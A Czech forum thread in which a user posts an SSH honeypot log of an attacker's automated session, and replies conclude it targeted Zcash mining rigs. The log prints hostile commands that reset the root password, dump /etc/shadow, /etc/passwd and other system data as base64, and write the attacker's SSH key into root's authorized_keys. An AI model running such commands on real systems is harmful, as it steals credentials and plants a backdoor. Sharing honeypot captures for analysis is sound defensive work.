SSH Honeypot - zajímavost

Čas od času si prohlížim log z SSH honeypotu a většinou jsou to celkem nezajímave pokusy :slight_smile: Ale včera se mi tam objevila celkem sofistikovaná záležitost:

$ echo https://configmaker.com/my/SilverUnluckyLonelyHagfish.txt > /home/ethos/remote.conf	Přijato	6. 11. 2017 19:21:46
$ sudo -n usermod /root/-p /81sG1WACcZgzPn8A0Wn58hHXWqy5yOgTlYJEbOjhkHD0MRsAkfJgjU/ioCYDeR1 root	Přijato	6. 11. 2017 19:21:46
$ echo '</cmd7iptables>'	Přijato	6. 11. 2017 19:21:46
$ sudo -n iptables -t nat -S | gzip | base64	Zamítnuto	6. 11. 2017 19:21:46
$ sudo -n iptables -S | gzip | base64	Zamítnuto	6. 11. 2017 19:21:46
$ echo '</cmd7sgminerconf><cmd7iptables>'	Přijato	6. 11. 2017 19:21:46
$ cat /var/run/ethos/sgminer.conf | gzip | base64	Zamítnuto	6. 11. 2017 19:21:46
$ echo '</cmd7claymorezstub><cmd7sgminerconf>'	Přijato	6. 11. 2017 19:21:46
$ cat /home/ethos/claymore-zcash.stub.conf | gzip | base64	Zamítnuto	6. 11. 2017 19:21:46
$ echo '</cmd7claymorestub><cmd7claymorezstub>'	Přijato	6. 11. 2017 19:21:46
$ cat /home/ethos/claymore.stub.conf | gzip | base64	Zamítnuto	6. 11. 2017 19:21:46
$ echo '</cmd7rclocal><cmd7claymorestub>'	Přijato	6. 11. 2017 19:21:46
$ cat /etc/rc.local | gzip | base64	Zamítnuto	6. 11. 2017 19:21:46
$ echo '</cmd7remoteconf><cmd7rclocal>'	Přijato	6. 11. 2017 19:21:46
$ cat /home/ethos/remote.conf | gzip | base64	Zamítnuto	6. 11. 2017 19:21:46
$ echo '</cmd7localconf><cmd7remoteconf>'	Přijato	6. 11. 2017 19:21:46
$ cat /home/ethos/local.conf | gzip | base64	Zamítnuto	6. 11. 2017 19:21:46
$ echo '</cmd7ifconfig><cmd7localconf>'	Přijato	6. 11. 2017 19:21:46
$ /sbin/ifconfig | gzip | base64	Zamítnuto	6. 11. 2017 19:21:46
$ echo '</cmd7arpan><cmd7ifconfig>'	Přijato	6. 11. 2017 19:21:46
$ /usr/sbin/arp -an | gzip | base64	Zamítnuto	6. 11. 2017 19:21:46
$ echo '</cmd7netstat><cmd7arpan>'	Přijato	6. 11. 2017 19:21:46
$ netstat -npta | gzip | base64	Zamítnuto	6. 11. 2017 19:21:46
$ echo '</cmd7psfaux><cmd7netstat>'	Přijato	6. 11. 2017 19:21:46
$ ps -faux | gzip | base64	Zamítnuto	6. 11. 2017 19:21:46
$ echo '</cmd7shadow><cmd7psfaux>'	Přijato	6. 11. 2017 19:21:46
$ sudo -n cat /etc/shadow | gzip | base64	Zamítnuto	6. 11. 2017 19:21:46
$ echo '</cmd7passwd><cmd7shadow>'	Přijato	6. 11. 2017 19:21:46
$ cat /etc/passwd | gzip | base64	Zamítnuto	6. 11. 2017 19:21:46
$ echo '</cmd7lshome><cmd7passwd>'	Přijato	6. 11. 2017 19:21:46
$ ls -la /home | gzip | base64	Zamítnuto	6. 11. 2017 19:21:46
$ echo '</cmd7authkey><cmd7lshome>'	Přijato	6. 11. 2017 19:21:46
$ cat /root/.ssh//authorized_keys | gzip | base64	Zamítnuto	6. 11. 2017 19:21:46
$ echo '</cmd7lastlog><cmd7authkey>'	Přijato	6. 11. 2017 19:21:46
$ lastlog | gzip | base64	Zamítnuto	6. 11. 2017 19:21:46
$ echo '</cmd7last><cmd7lastlog>'	Přijato	6. 11. 2017 19:21:46
$ last | gzip | base64	Zamítnuto	6. 11. 2017 19:21:46
$ echo '</cmd7who><cmd7last>'	Přijato	6. 11. 2017 19:21:46
$ who | gzip | base64	Zamítnuto	6. 11. 2017 19:21:46
$ echo '</cmd7w><cmd7who>'	Přijato	6. 11. 2017 19:21:46
$ w | gzip | base64	Zamítnuto	6. 11. 2017 19:21:46
$ echo '</cmd7uptime><cmd7w>'	Přijato	6. 11. 2017 19:21:46
$ uptime | gzip | base64	Zamítnuto	6. 11. 2017 19:21:46
$ echo '</cmd7uname><cmd7uptime>'	Přijato	6. 11. 2017 19:21:46
$ uname -a | gzip | base64	Zamítnuto	6. 11. 2017 19:21:46
$ echo '<cmd7uname>'	Přijato	6. 11. 2017 19:21:46
$ echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC6apTpBLxylca9D2EVjfr8xa6OadS2c0oR4RYLkJiIp2XoWkJKqxVodz0s2gfQrMb9qr3oJQVoT4M1WHd829D5Wu2kJY4RMFSo+Rb2dszg0PQJ5Ug1pEW1DedYR379sjoIiF/qbaDzq3FtkUx9+5E/BiqdMGyncml3yinN6HuNH+Fnhv6TtS45Re6gI1rA21qFguBF5U3yPFKeF5ElH997x/0rf3Qr01v38F2994IEXZ3fiaZTkw7k/ul9CnuCuIlCkPGeO7xkpR/70sU077scxbArlCe/ch5BSBK9u8nOCBUBV7AlgZ9RojfTp/wbqqg20zfB7pwEaaMI25zP5QsF	Přijato	6. 11. 2017 19:21:46
$ sudo echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC6apTpBLxylca9D2EVjfr8xa6OadS2c0oR4RYLkJiIp2XoWkJKqxVodz0s2gfQrMb9qr3oJQVoT4M1WHd829D5Wu2kJY4RMFSo+Rb2dszg0PQJ5Ug1pEW1DedYR379sjoIiF/qbaDzq3FtkUx9+5E/BiqdMGyncml3yinN6HuNH+Fnhv6TtS45Re6gI1rA21qFguBF5U3yPFKeF5ElH997x/0rf3Qr01v38F2994IEXZ3fiaZTkw7k/ul9CnuCuIlCkPGeO7xkpR/70sU077scxbArlCe/ch5BSBK9u8nOCBUBV7AlgZ9RojfTp/wbqqg20zfB7pwEaaMI25zP5QsF > /root/.ssh/authorized_keys	Přijato	6. 11. 2017 19:21:46
$ echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC6apTpBLxylca9D2EVjfr8xa6OadS2c0oR4RYLkJiIp2XoWkJKqxVodz0s2gfQrMb9qr3oJQVoT4M1WHd829D5Wu2kJY4RMFSo+Rb2dszg0PQJ5Ug1pEW1DedYR379sjoIiF/qbaDzq3FtkUx9+5E/BiqdMGyncml3yinN6HuNH+Fnhv6TtS45Re6gI1rA21qFguBF5U3yPFKeF5ElH997x/0rf3Qr01v38F2994IEXZ3fiaZTkw7k/ul9CnuCuIlCkPGeO7xkpR/70sU077scxbArlCe/ch5BSBK9u8nOCBUBV7AlgZ9RojfTp/wbqqg20zfB7pwEaaMI25zP5QsF > /root/.ssh//authorized_keys	Přijato	6. 11. 2017 19:21:46
$ mkdir -p /root/.ssh

Tušíte někdo o co se (utočník) pokoušel? Já to od oka odhaduji na instalaci miningu ale kdo ví :slight_smile:

jj, na beton těžba…

Očividně těžba ZCashe. Těžba jedné z kryptoměn, které jsou charakteristické vysokou mírou anonymity.

U mě poslední dobou pokus o nahrání souborů k mirai botnet, jen tak pro zajímavost jsem si od útočníka soubory stáhl.

To je skoro u všech, taky jsem to ráno viděl.
Různí útočníci, různé IP, výsledek stejný.